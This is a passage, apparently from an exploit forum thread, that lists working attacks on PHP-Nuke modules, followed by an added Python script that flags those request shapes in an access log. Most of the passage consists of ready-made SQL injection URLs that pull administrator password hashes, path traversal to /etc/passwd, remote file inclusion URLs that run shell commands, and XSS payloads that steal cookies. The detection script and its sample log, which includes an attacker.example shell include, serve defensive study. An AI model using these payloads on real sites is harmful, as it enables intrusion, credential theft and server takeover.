name=NukeJokes&file=send&func=send&jokeid=-1'/**/union select concat(aid,0x3a,pwd) from nuke_authors limit 0,1/*&sendername=aaa&senderemail=aaa%40mail.ru&toname=bbb&toemail=aaa%40mail.ru
```
we get the administrator's aid:hash at the email address we specified.
Vulnerability in file: search.php
PHP:
```php
function search($q, $cat){
    global $module_name, $prefix, $bgcolor1, $bgcolor2, $dbi, $prefix;
    include("header.php");
    if($cat==0){
        $cats = " ";
    }else{
        $cats = " cat=".$cat." AND ";
    }
    ModuleSearch();
    ...
    $search = sql_query("SELECT jokeid, author, date, name, cat, hits, ratings FROM ".$prefix."_jokes WHERE".$cats."(name LIKE '%$q%' OR joke LIKE '%$q%')", $dbi);
```
The vulnerability is in the cat and q parameters.
Example request:
Code:
```
/modules.php?name=NukeJokes&file=search&func=search&q=x&cat=7%0aunion+select+1,2,3,4,5,6,7%23
```
Vulnerability in file: comments.php
PHP:
```php
function JokesAddCom($jokeid, $author, $comment){
    global $prefix, $dbi, $bgcolor1, $module_name, $bgcolor2;
    $author = FixQuotes(nl2br(filter_text($author)));
    $comment = FixQuotes(nl2br(filter_text($comment)));
    sql_query("INSERT into ".$prefix."_jokes_comments VALUES(NULL, '$author' ,'$comment' , '$jokeid')", $dbi);
```
In the filter_text function html tags are removed, then the data goes into the FixQuotes function:
PHP:
```php
function FixQuotes ($what = "") {
    while (stristr($what, "\\\\'")) {
        $what = str_replace("\\\\'","'",$what);
    }
    return $what;
}
```
Why this function was used here is unclear; with magic_quotes_gpc=off we can easily inject our sql code. To do this pick any joke, click "add comment", and put in the cookie:
Code:
```
author=aa',(select concat(aid,0x3a,pwd) from nuke_authors limit 0,1),Существующий_ID)/*
```
As a result we get the admin's aid:hash.
In modules:
Code:
```
http://site/modules.php?name=Search&type=comments&query=not123 exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
http://www.strona.pl/modules.php?name=Search&file=../../../../../../../../../etc/passwd%008
```
Code:
```
http://site/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../../../../etc/passwd
```
Code:
```
http://site/modules.php?name=Private_Messages&file=index&folder=inbox&mode=read&p=1&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox
```
Code:
```
http://site/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20--
```
Code:
```
http://site/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999
```
Code:
```
http://site/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--
```
Code:
```
http://site/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
```
In galleries:
Code:
```
http://site/modules/My_eGallery/public/displayCategory.php?basepath=yourshell.txt?&cmd=uname -a;id;pwd
```
Code:
```
http://site/modules/4nAlbum/public/displayCategory.php?basepath=yourshell.txt?&cmd=uname -a;id;pwd
```
Code:
```
http://site/modules/coppermine/upload.php?basepath=yourshell.txt?&cmd=uname%20-a;id;pwd
```
Code:
```
http://site/modules/coppermine/themes/default/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd
```
Code:
```
http://site/modules/coppermine/include/init.inc.php?CPG_M_DIR=yourshell.txt?&cmd=uname -a;id;pwd
```
Code:
```
http://site/modules/coppermine/themes/maze/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd
```
Code:
```
http://site/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=yourshell.txt?&cmd=uname -a;id;pwd
```
Code:
```
http://site/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=yourshell.txt?&cmd=uname%20-a;id
```
Includes:
Code:
```
http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=shell?
http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=shell?
```
XSS
Versions:
Code:
```
PHP-Nuke 7.3
PHP-Nuke 7.2
PHP-Nuke 7.1
PHP-Nuke 7.0 FINAL
PHP-Nuke 7.0
PHP-Nuke 6.9
PHP-Nuke 6.7
PHP-Nuke 6.6
PHP-Nuke 6.5 RC3
PHP-Nuke 6.5 RC2
PHP-Nuke 6.5 RC1
PHP-Nuke 6.5 FINAL
PHP-Nuke 6.5 BETA 1
PHP-Nuke 6.5
PHP-Nuke 6.0
```
Code:
```
http://www.example.com/modules.php?name=News&file=article&sid=1&optionbox=[xsscode here]
http://www.example.com/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=[xss code here]
http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=[xss code here]&month=05&month_l=May
http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss code here]&month_l=May
http://www.example.com/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=[xss code here]
http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=[xss code here]&order=0&thold=0
http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss code here]&thold=0
http://www.example.com/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss code here]
http://www.example.com/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>
```
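Across this thread the injected requests share a few recurring shapes: UNION SELECT split by %0a or /**/ (the Pages, Mediacatalog, Search and EasyContent posts), a %00 null byte before the closing quote (the Your_Account activate and admin.php posts), ../ in a file parameter (the Search post) and an external location in basepath, THEME_DIR or phpbb_root_path (the gallery and Forums posts). The following is an added example, not from the thread or from PHP-Nuke: it decodes request lines from a constructed Apache-style access log, folds the comment and newline obfuscation, and tags each of those shapes. It only sees the request line, so the cookie- and POST-based variants (Reviews, Video_Stream comment.php, NukeJokes) need request-body logging to be caught the same way.

```python
"""Flag the request shapes quoted in this thread in a web-server access log.

Added example, not code from the thread or from PHP-Nuke. Only the request
line is inspected; cookie and POST-body injections are out of scope here.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request-line extractor for Apache/nginx "combined" format.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# SQL-keyword rules, applied after comment stripping and whitespace folding.
SQL_RULES = {
    "sqli_union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "sqli_subselect": re.compile(r"\(\s*select\b", re.I),
    "sqli_outfile": re.compile(r"\binto\s+outfile\b", re.I),
    "sqli_benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
}

# Parameters that PHP-Nuke and its modules treat as file or directory paths
# (names taken from the URLs quoted in the thread, compared case-insensitively).
PATH_PARAMS = {"file", "basepath", "phpbb_root_path", "theme_dir",
               "cpg_m_dir", "gallery_basedir"}


def normalize_sql(value: str) -> str:
    """Strip /**/ comments and fold %0a/newlines so split keywords line up."""
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value)


def classify_target(target: str) -> list[str]:
    """Return the sorted names of the suspicious shapes in one request target."""
    findings = set()
    parts = urlsplit(target)
    if "../" in unquote(parts.path):
        findings.add("path_traversal")
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(raw)  # second decode catches %2500-style double encoding
        if "\x00" in value:
            findings.add("null_byte")
        normalized = normalize_sql(value)
        for rule, pattern in SQL_RULES.items():
            if pattern.search(normalized):
                findings.add(rule)
        if name.lower() in PATH_PARAMS:
            if "../" in value:
                findings.add("path_traversal")
            if "://" in value:
                findings.add("remote_include")
    return sorted(findings)


def scan_log(text: str) -> list[tuple[int, str, list[str]]]:
    """Return (line number, target, findings) for every log line with findings."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = classify_target(match.group("target"))
        if findings:
            hits.append((lineno, match.group("target"), findings))
    return hits


# Constructed sample log (not captured traffic); request shapes follow the thread.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Dec/2008:12:02:00 +0000] "GET /modules.php?name=News&file=article&sid=554 HTTP/1.1" 200 5120
203.0.113.5 - - [15/Dec/2008:12:02:01 +0000] "GET /modules.php?name=Pages&pa=list_pag&cid=-2%0aunion+select+aid,pwd+from+nuke_authors%23 HTTP/1.1" 200 3100
203.0.113.5 - - [15/Dec/2008:12:02:02 +0000] "GET /modules.php?name=Your_Account&op=activate&username=Nick&check_num=1%00'+OR+(SELECT+IF(1,1,null))='1 HTTP/1.1" 200 900
203.0.113.5 - - [15/Dec/2008:12:02:03 +0000] "GET /modules.php?name=Search&file=../../../../../../etc/passwd%00 HTTP/1.1" 200 400
203.0.113.5 - - [15/Dec/2008:12:02:04 +0000] "GET /modules/coppermine/upload.php?basepath=http://attacker.example/shell.txt? HTTP/1.1" 500 0
203.0.113.5 - - [15/Dec/2008:12:02:05 +0000] "GET /modules.php?name=Search&type=comments&query=x&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors HTTP/1.1" 200 3000
203.0.113.5 - - [15/Dec/2008:12:02:06 +0000] "GET /modules.php?name=Search&query=union+members HTTP/1.1" 200 2100
"""

if __name__ == "__main__":
    for lineno, target, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(findings)}  {target}")
```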